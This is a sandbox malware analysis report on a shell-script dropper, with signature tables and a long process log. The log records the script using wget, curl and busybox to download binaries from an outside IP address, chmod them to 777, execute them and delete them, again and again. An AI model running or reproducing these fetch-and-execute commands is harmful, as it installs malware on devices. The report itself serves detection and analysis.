Malware Analysis Report

2024-12-07 16:36

Sample ID 241114-ddqm8atdrm
Target a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh
SHA256 a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff

Threat Level: Shows suspicious behavior

The file a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-14 02:53

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-14 02:53

Reported

2024-11-14 02:56

Platform

debian9-mipsbe-20240729-en

Max time kernel

125s

Max time network

127s

Command Line

[/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH N/A
N/A /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy N/A
N/A /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz N/A
N/A /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 N/A
N/A /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 N/A
N/A /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD N/A
N/A /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP N/A
N/A /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw N/A
N/A /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs N/A
N/A /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z N/A
N/A /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db N/A
N/A /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq N/A
N/A /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ N/A
N/A /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt N/A
N/A /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH N/A
N/A /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD N/A
N/A /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP N/A
N/A /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw N/A
N/A /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy N/A
N/A /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz N/A
N/A /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 N/A
N/A /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 N/A
N/A /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs N/A
N/A /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z N/A
N/A /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt N/A
N/A /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db N/A
N/A /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq N/A
N/A /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw /usr/bin/curl N/A
File opened for modification /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ /usr/bin/curl N/A
File opened for modification /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 /usr/bin/curl N/A
File opened for modification /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP /usr/bin/curl N/A
File opened for modification /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z /usr/bin/curl N/A
File opened for modification /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt /usr/bin/curl N/A
File opened for modification /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz /usr/bin/curl N/A
File opened for modification /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /usr/bin/curl N/A
File opened for modification /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /usr/bin/curl N/A
File opened for modification /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db /usr/bin/curl N/A
File opened for modification /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 /usr/bin/curl N/A
File opened for modification /tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4 /usr/bin/curl N/A
File opened for modification /tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP /usr/bin/curl N/A
File opened for modification /tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db /usr/bin/curl N/A
File opened for modification /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq /usr/bin/curl N/A
File opened for modification /tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932 /usr/bin/curl N/A
File opened for modification /tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt /usr/bin/curl N/A
File opened for modification /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs /usr/bin/curl N/A
File opened for modification /tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq /usr/bin/curl N/A
File opened for modification /tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ /usr/bin/curl N/A
File opened for modification /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy /usr/bin/curl N/A
File opened for modification /tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs /usr/bin/curl N/A
File opened for modification /tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z /usr/bin/curl N/A
File opened for modification /tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy /usr/bin/curl N/A
File opened for modification /tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD /usr/bin/curl N/A
File opened for modification /tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH /usr/bin/curl N/A
File opened for modification /tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw /usr/bin/curl N/A
File opened for modification /tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz /usr/bin/curl N/A

Processes

/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh

[/tmp/a6080262ea0c440b8e0f3f1799a1d992f83c1f7861993c1edb4185211acbc3ff.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/chmod

[chmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH

[./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/rm

[rm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/usr/bin/wget

[wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/bin/chmod

[chmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy

[./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/bin/rm

[rm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/usr/bin/wget

[wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/bin/chmod

[chmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz

[./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/bin/rm

[rm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/usr/bin/wget

[wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/bin/chmod

[chmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4

[./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/bin/rm

[rm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/usr/bin/wget

[wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/bin/chmod

[chmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932

[./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/bin/rm

[rm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/usr/bin/wget

[wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/chmod

[chmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD

[./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/rm

[rm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/usr/bin/wget

[wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/chmod

[chmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP

[./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/rm

[rm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/usr/bin/wget

[wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/bin/chmod

[chmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw

[./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/bin/rm

[rm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/usr/bin/wget

[wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/bin/chmod

[chmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs

[./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/bin/rm

[rm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/usr/bin/wget

[wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/bin/chmod

[chmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/tmp/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z

[./1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/bin/rm

[rm 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/usr/bin/wget

[wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/bin/chmod

[chmod 777 S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/tmp/S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db

[./S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/bin/rm

[rm S1yQbJJqsxutFfMd773H9H8eSVOHhHs3db]

/usr/bin/wget

[wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/bin/chmod

[chmod 777 IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/tmp/IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq

[./IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/bin/rm

[rm IzUor4CncpgQBrMSVS6lA6UObBDbUtCYRq]

/usr/bin/wget

[wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/bin/chmod

[chmod 777 ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/tmp/ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ

[./ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/bin/rm

[rm ysc6biA4IgoxzZzjEFUn82WVsduROTl3DQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/bin/chmod

[chmod 777 xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/tmp/xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt

[./xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/bin/rm

[rm xBYmhoIPx6iFtPaabqE8Vx4eSbzj0n8dzt]

/usr/bin/wget

[wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/chmod

[chmod 777 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/tmp/49irlYlhW1pQmwlDaVrLaKzYecToHyUObH

[./49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/bin/rm

[rm 49irlYlhW1pQmwlDaVrLaKzYecToHyUObH]

/usr/bin/wget

[wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/chmod

[chmod 777 lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/tmp/lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD

[./lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/bin/rm

[rm lZF8LM8bTjcsKdc3ngN6DWZxo6IXSLmJWD]

/usr/bin/wget

[wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/chmod

[chmod 777 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/tmp/7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP

[./7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/bin/rm

[rm 7oLEIWeAcEm3zmyGwH9aybrya5jGaPsAOP]

/usr/bin/wget

[wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/bin/chmod

[chmod 777 dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/tmp/dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw

[./dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/bin/rm

[rm dvK4BafVbBSUJi1hDpPTFoUEfrRHVic6cw]

/usr/bin/wget

[wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/bin/chmod

[chmod 777 qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/tmp/qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy

[./qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/bin/rm

[rm qHCs9tlmlN5waXGL6N7vD1TKNE2fMAKQTy]

/usr/bin/wget

[wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/bin/chmod

[chmod 777 V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/tmp/V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz

[./V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/bin/rm

[rm V565oMREGt3pi5uNXK6zgs7WwRfUAkq9Pz]

/usr/bin/wget

[wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/bin/chmod

[chmod 777 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/tmp/5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4

[./5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/bin/rm

[rm 5KGRoi6CG47lqx1xe9GeG7BrJLflLTQzm4]

/usr/bin/wget

[wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/bin/chmod

[chmod 777 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/tmp/2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932

[./2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/bin/rm

[rm 2i7eUZodswPOZ3YHkvfHkejyH5tSnDy932]

/usr/bin/wget

[wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/bin/chmod

[chmod 777 gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/tmp/gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs

[./gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/bin/rm

[rm gZeyZnrbbOM2HwEOfAPqOHTPWW8ESaG5gs]

/usr/bin/wget

[wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

/bin/chmod

[chmod 777 1BSmB9KGuK6znFf5VBDep3VxMqq2wef23z]

